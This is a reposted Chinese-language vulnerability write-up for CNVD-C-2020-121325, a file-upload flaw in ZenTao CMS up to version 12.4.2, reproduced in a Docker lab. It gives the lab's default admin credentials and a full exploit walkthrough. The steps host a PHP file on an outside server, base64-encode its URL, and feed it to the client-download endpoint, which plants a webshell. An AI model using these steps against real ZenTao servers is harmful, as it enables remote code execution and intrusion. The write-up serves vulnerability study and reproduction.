0
0

【CNVD/CVE】CNVD-C-2020-121325

文章目录

一、漏洞概述

禅道CMS<=12.4.2版本存在文件上传漏洞,该漏洞由于开发者对link参数过滤不严,导致攻击者对下载链接可控,导致可远程下载服务器恶意脚本文件,造成任意代码执行,获取webshell。

二、漏洞影响范围

禅道CMS<=12.4.2

三、环境搭建

docker-compose.yml

version:'3.2'services:web:image: nudttan91/cnvd-c-2020-121325:normal
    ports:-80:80

四、利用流程

1、登录

进入环境后如图所示:
在这里插入图片描述
用户名:

admin

密码:

123456

在这里插入图片描述
登录进来后正常重置密码
在这里插入图片描述

2、准备

(1)在服务器上准备相关的木马程序

shell.php

<?phpecho"<?php phpinfo();?>";

打开

apache

或者

nginx

就可以,反正是从公网能够下载到

shell.php

这个的文件的方法都行

(2)对恶意文件地址进行base64编码

http://xxx.xxx.xxx.xxx/shell.php

在这里插入图片描述

aHR0cDovL3h4eC54eHgueHh4Lnh4eC9zaGVsbC5waHA=

3、利用poc远程下载文件

http://xxx.xxx.xxx.xxx/zentao/client-download-1-aHR0cDovL3h4eC54eHgueHh4Lnh4eC9zaGVsbC5waHA=-1.html

在这里插入图片描述

在这里插入图片描述

4、getshell

shell地址:

http://xxx.xxx.xxx.xxx/zentao/data/client/1/shell.php

在这里插入图片描述

标签: php 服务器 开发语言
本文转载自: https://blog.csdn.net/ZXW_NUDT/article/details/129959003
版权归原作者 tan 91 所有, 如有侵权,请联系我们删除。
登录后发布评论

“【CNVD/CVE】CNVD-C-2020-121325”的评论:

还没有评论
关于作者
...
overfit同步小助手
文章同步
相关阅读

网络安全法-网络运行安全

使用selenium/drissionpage时如何阻止chrome自动跳转http到https

docker desktop 里部署的Open WebUI 管理员密码忘记了的处理方法

在ubuntu20.04中搭建onsite比赛运行环境

利用开源的低代码表单设计器FcDesigner高效管理和渲染复杂表单结构

Kafka学习笔记

【前端】浏览器输入url到页面呈现发生了什么?

文章导航